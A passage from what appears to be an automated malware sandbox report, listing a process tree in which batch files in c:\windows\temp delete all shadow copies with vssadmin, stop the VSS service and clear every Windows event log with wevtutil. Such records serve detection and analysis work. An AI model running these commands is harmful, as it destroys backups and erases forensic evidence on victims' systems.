    WEVTUTIL CL "Microsoft-Windows-TerminalServices-RDPClient/Analytic"
    3⤵
    PID:2340
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-RDPClient/Debug"
    3⤵
    PID:2472
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-RDPClient/Operational"
    3⤵
    PID:1512
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"
    3⤵
    PID:1664
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"
    3⤵
    PID:2876
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"
    3⤵
    PID:856
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"
    3⤵
    PID:2580
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug"
    3⤵
    PID:1736
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"
    3⤵
    PID:228
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-ServerUSBDevices/Admin"
    3⤵
    PID:476
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-ServerUSBDevices/Analytic"
    3⤵
    PID:1640
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-ServerUSBDevices/Operational"
    3⤵
    PID:2628
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-ServerUSBDevices/Debug"
    3⤵
    PID:1312
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ThemeCPL/Diagnostic"
    3⤵
    PID:2932
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ThemeUI/Diagnostic"
    3⤵
    PID:2964
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TunnelDriver"
    3⤵
    PID:2488
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-UAC-FileVirtualization/Operational"
    3⤵
    PID:1696
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-UAC/Operational"
    3⤵
    PID:2960
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-UIAnimation/Diagnostic"
    3⤵
    PID:956
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-UIAutomationCore/Debug"
    3⤵
    PID:1744
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-UIAutomationCore/Diagnostic"
    3⤵
    PID:2436
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-UIAutomationCore/Perf"
    3⤵
    PID:2636
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-UIRibbon/Diagnostic"
    3⤵
    PID:2100
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-USB-USBHUB/Diagnostic"
    3⤵
    PID:156
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-USB-USBPORT/Diagnostic"
    3⤵
    PID:2844
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-User Control Panel Performance/Diagnostic"
    3⤵
    PID:216
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-User Profile Service/Diagnostic"
    3⤵
    PID:1828
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-User Profile Service/Operational"
    3⤵
    PID:2596
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-User-Loader/Analytic"
    3⤵
    PID:2008
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-UserModePowerService/Diagnostic"
    3⤵
    PID:2016
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-UserPnp/DeviceMetadata/Debug"
    3⤵
    PID:2652
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-UserPnp/DeviceNotifications"
    3⤵
    PID:1580
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-UserPnp/Performance"
    3⤵
    PID:2312
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-UserPnp/SchedulerOperations"
    3⤵
    PID:1296
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-UxTheme/Diagnostic"
    3⤵
    PID:2004
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-VAN/Diagnostic"
    3⤵
    PID:1880
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-VDRVROOT/Operational"
    3⤵
    PID:2508
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-VHDMP/Operational"
    3⤵
    PID:2140
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-VWiFi/Diagnostic"
    3⤵
    PID:1968
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-VolumeControl/Performance"
    3⤵
    PID:796
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-VolumeSnapshot-Driver/Operational"
    3⤵
    PID:1296
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WABSyncProvider/Analytic"
    3⤵
    PID:2436
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WCN-Config-Registrar/Diagnostic"
    3⤵
    PID:2620
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WER-Diag/Operational"
    3⤵
    PID:1336
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WFP/Analytic"
    3⤵
    PID:2632
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WFP/Operational"
    3⤵
    PID:880
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WLAN-AutoConfig/Operational"
    3⤵
    PID:708
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WLAN-Autoconfig/Diagnostic"
    3⤵
    PID:2476
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WLANConnectionFlow/Diagnostic"
    3⤵
    PID:860
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WMI-Activity/Trace"
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1080
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WMPDMCCore/Diagnostic"
    3⤵
    PID:788
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WMPDMCUI/Diagnostic"
    3⤵
    PID:2768
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WMPNSS-PublicAPI/Diagnostic"
    3⤵
    PID:1876
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WMPNSS-Service/Diagnostic"
    3⤵
    PID:544
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WMPNSSUI/Diagnostic"
    3⤵
    PID:2488
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WPD-ClassInstaller/Analytic"
    3⤵
    PID:2068
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WPD-ClassInstaller/Operational"
    3⤵
    PID:2712
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WPD-CompositeClassDriver/Analytic"
    3⤵
    PID:2696
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WPD-CompositeClassDriver/Operational"
    3⤵
    PID:1076
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WPD-MTPClassDriver/Operational"
    3⤵
    PID:2892
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WSC-SRV/Diagnostic"
    3⤵
    PID:576
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WUSA/Debug"
    3⤵
    PID:1660
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WWAN-MM-Events/Diagnostic"
    3⤵
    PID:2760
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WWAN-NDISUIO-EVENTS/Diagnostic"
    3⤵
    PID:2176
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WWAN-SVC-Events/Diagnostic"
    3⤵
    PID:280
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WWAN-UI-Events/Diagnostic"
    3⤵
    PID:2772
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WebIO-NDF/Diagnostic"
    3⤵
    PID:916
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WebIO/Diagnostic"
    3⤵
    PID:972
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WebServices/Tracing"
    3⤵
    PID:1588
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Win32k/Concurrency"
    3⤵
    PID:2544
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Win32k/Power"
    3⤵
    PID:2520
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Win32k/Render"
    3⤵
    PID:2180
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Win32k/Tracing"
    3⤵
    PID:1960
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Win32k/UIPI"
    3⤵
    PID:712
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WinHTTP-NDF/Diagnostic"
    3⤵
    PID:2956
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WinHttp/Diagnostic"
    3⤵
    PID:324
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-WinINet/Analytic"
    3⤵
    PID:2188
- C:\Windows\SYSTEM32\cmd.exe
  C:\Windows\SYSTEM32\cmd.exe /c "c:\windows\temp\iotig.bat"
  2⤵
  PID:1812
- - C:\Windows\system32\sc.exe
    sc start vss
    3⤵
    PID:2724
- - C:\Windows\system32\timeout.exe
    timeout /T 5
    3⤵
    - Delays execution with timeout.exe
    PID:2832
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    PID:2588
- - C:\Windows\System32\vssadmin.exe
    C:\Windows\System32\vssadmin.exe Delete Shadows /all /quiet
    3⤵
    PID:2684
- - C:\Windows\SysWOW64\vssadmin.exe
    C:\Windows\SysWOW64\vssadmin.exe Delete Shadows /all /quiet
    3⤵
    PID:1080
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:1532
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
    3⤵
    PID:588
- - C:\Windows\System32\vssadmin.exe
    C:\Windows\System32\vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB
    3⤵
    PID:1716
- - C:\Windows\System32\vssadmin.exe
    C:\Windows\System32\vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=unbounded
    3⤵
    PID:972
- - C:\Windows\SysWOW64\vssadmin.exe
    C:\Windows\SysWOW64\vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB
    3⤵
    PID:1232
- - C:\Windows\SysWOW64\vssadmin.exe
    C:\Windows\SysWOW64\vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=unbounded
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1032
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=F: /on=F: /maxsize=401MB
    3⤵
    PID:1776
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=F: /on=F: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:1212
- - C:\Windows\System32\vssadmin.exe
    C:\Windows\System32\vssadmin.exe resize shadowstorage /for=F: /on=F: /maxsize=401MB
    3⤵
    PID:304
- - C:\Windows\System32\vssadmin.exe
    C:\Windows\System32\vssadmin.exe resize shadowstorage /for=F: /on=F: /maxsize=unbounded
    3⤵
    PID:2008
- - C:\Windows\SysWOW64\vssadmin.exe
    C:\Windows\SysWOW64\vssadmin.exe resize shadowstorage /for=F: /on=F: /maxsize=401MB
    3⤵
    PID:2892
- - C:\Windows\SysWOW64\vssadmin.exe
    C:\Windows\SysWOW64\vssadmin.exe resize shadowstorage /for=F: /on=F: /maxsize=unbounded
    3⤵
    PID:2132
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    PID:692
- - C:\Windows\System32\vssadmin.exe
    C:\Windows\System32\vssadmin.exe Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:2260
- - C:\Windows\SysWOW64\vssadmin.exe
    C:\Windows\SysWOW64\vssadmin.exe Delete Shadows /all /quiet
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2384
- - C:\Windows\system32\sc.exe
    sc stop VSS
    3⤵
    PID:2004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c WEVTUTIL EL
    3⤵
    PID:3068
  - - C:\Windows\system32\wevtutil.exe
      WEVTUTIL EL
      4⤵
      PID:156
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Analytic"
    3⤵
    PID:2828
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Application"
    3⤵
    PID:1372
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "DebugChannel"
    3⤵
    PID:2808
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "DirectShowFilterGraph"
    3⤵
    PID:1572
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "DirectShowPluginControl"
    3⤵
    PID:1996
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Els_Hyphenation/Analytic"
    3⤵
    PID:1340
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "EndpointMapper"
    3⤵
    PID:2696
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "ForwardedEvents"
    3⤵
    PID:2620
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "HardwareEvents"
    3⤵
    PID:224
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Internet Explorer"
    3⤵
    PID:2796
- C:\Windows\SYSTEM32\cmd.exe
  C:\Windows\SYSTEM32\cmd.exe /c "c:\windows\temp\pnx.bat"
  2⤵
  PID:1088
- - C:\Windows\system32\sc.exe
    sc start vss
    3⤵
    PID:1560
- - C:\Windows\system32\timeout.exe
    timeout /T 5
    3⤵
    - Delays execution with timeout.exe
    PID:2704

C:\Windows\system32\taskeng.exe
taskeng.exe {6B47DACB-6E19-4577-A322-006607FBFD53} S-1-5-21-3470981204-343661084-3367201002-1000:GLTGRJAG\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:2708
- C:\Windows\SYSTEM32\cmd.exe
  C:\Windows\SYSTEM32\cmd.exe /c "c:\windows\temp\bweokw.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2492
- - C:\Windows\system32\sc.exe
    sc start vss
    3⤵
    PID:780
- - C:\Windows\system32\timeout.exe
    timeout /T 5
    3⤵
    - Delays execution with timeout.exe
    PID:1984
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    PID:2136
- - C:\Windows\System32\vssadmin.exe
    C:\Windows\System32\vssadmin.exe Delete Shadows /all /quiet
    3⤵
    PID:1812
- - C:\Windows\SysWOW64\vssadmin.exe
    C:\Windows\SysWOW64\vssadmin.exe Delete Shadows /all /quiet
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1948
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
    3⤵
    PID:2808
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
    3⤵
    PID:2596
- - C:\Windows\System32\vssadmin.exe
    C:\Windows\System32\vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB
    3⤵
    PID:2524
- - C:\Windows\System32\vssadmin.exe
    C:\Windows\System32\vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=unbounded
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\vssadmin.exe
    C:\Windows\SysWOW64\vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2500
- - C:\Windows\SysWOW64\vssadmin.exe
    C:\Windows\SysWOW64\vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=unbounded
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2728
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=F: /on=F: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1544
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=F: /on=F: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    PID:2644
- - C:\Windows\System32\vssadmin.exe
    C:\Windows\System32\vssadmin.exe resize shadowstorage /for=F: /on=F: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    PID:2140
- - C:\Windows\System32\vssadmin.exe
    C:\Windows\System32\vssadmin.exe resize shadowstorage /for=F: /on=F: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    PID:2720
- - C:\Windows\SysWOW64\vssadmin.exe
    C:\Windows\SysWOW64\vssadmin.exe resize shadowstorage /for=F: /on=F: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2744
- - C:\Windows\SysWOW64\vssadmin.exe
    C:\Windows\SysWOW64\vssadmin.exe resize shadowstorage /for=F: /on=F: /maxsize=unbounded
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1968
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    PID:588
- - C:\Windows\System32\vssadmin.exe
    C:\Windows\System32\vssadmin.exe Delete Shadows /all /quiet
    3⤵
    PID:2456
- - C:\Windows\SysWOW64\vssadmin.exe
    C:\Windows\SysWOW64\vssadmin.exe Delete Shadows /all /quiet
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:788
- - C:\Windows\system32\sc.exe
    sc stop VSS
    3⤵
    PID:1444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c WEVTUTIL EL
    3⤵
    PID:2236
  - - C:\Windows\system32\wevtutil.exe
      WEVTUTIL EL
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1456
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Analytic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1212
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Application"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2820
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "DebugChannel"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1336
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "DirectShowFilterGraph"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1644
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "DirectShowPluginControl"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2152
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Els_Hyphenation/Analytic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2120
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "EndpointMapper"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:648
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "ForwardedEvents"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2888
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "HardwareEvents"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1228
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Internet Explorer"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1248
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Key Management Service"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1836
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "MF_MediaFoundationDeviceProxy"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2160
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Media Center"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1640
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "MediaFoundationDeviceProxy"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1932
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "MediaFoundationPerformance"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1672
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "MediaFoundationPipeline"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2196
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "MediaFoundationPlatform"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:240
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-IE/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2472
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-IEDVTOOL/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3024
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-IEFRAME/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:920
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-JSDumpHeap/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2756
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-PerfTrack-IEFRAME/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2220
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-PerfTrack-MSHTML/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1512
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ADSI/Debug"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2400
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-API-Tracing/Operational"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1468
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ATAPort/General"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:724
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ATAPort/SATA-LPM"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:852
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ActionQueue/Analytic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2132
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AltTab/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppID/Operational"
    3⤵
    PID:1876
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppLocker/EXE and DLL"
    3⤵
    PID:1600
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppLocker/MSI and Script"
    3⤵
    PID:2932
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Admin"
    3⤵
    PID:2060
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Analytic"
    3⤵
    PID:2632
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Debug"
    3⤵
    PID:908
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Operational"
    3⤵
    PID:3048
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"
    3⤵
    PID:1408
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
    3⤵
    PID:2392
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
    3⤵
    PID:2360
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Inventory"
    3⤵
    PID:1708
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"
    3⤵
    PID:2200
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Telemetry"
    3⤵
    PID:1664
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Audio/CaptureMonitor"
    3⤵
    PID:1296
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Audio/Operational"
    3⤵
    PID:2028
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Audio/Performance"
    3⤵
    PID:1552
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Audit/Analytic"
    3⤵
    PID:1036
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Authentication User Interface/Operational"
    3⤵
    PID:2616
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AxInstallService/Log"
    3⤵
    PID:2624
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Backup"
    3⤵
    PID:2372
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Biometrics/Operational"
    3⤵
    PID:1556
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
    3⤵
    PID:2552
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
    3⤵
    PID:2872
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Bits-Client/Analytic"
    3⤵
    PID:2488
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Bits-Client/Operational"
    3⤵
    PID:2964
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
    3⤵
    PID:2436
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BranchCache/Operational"
    3⤵
    PID:212
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
    3⤵
    PID:232
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
    3⤵
    PID:1564
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BranchCacheSMB/Analytic"
    3⤵
    PID:3016
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BranchCacheSMB/Operational"
    3⤵
    PID:2560
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CAPI2/Operational"
    3⤵
    PID:2652
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CDROM/Operational"
    3⤵
    PID:2992
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-COM/Analytic"
    3⤵
    PID:2276
- - C:\Windows\system32\wevtutil.exe
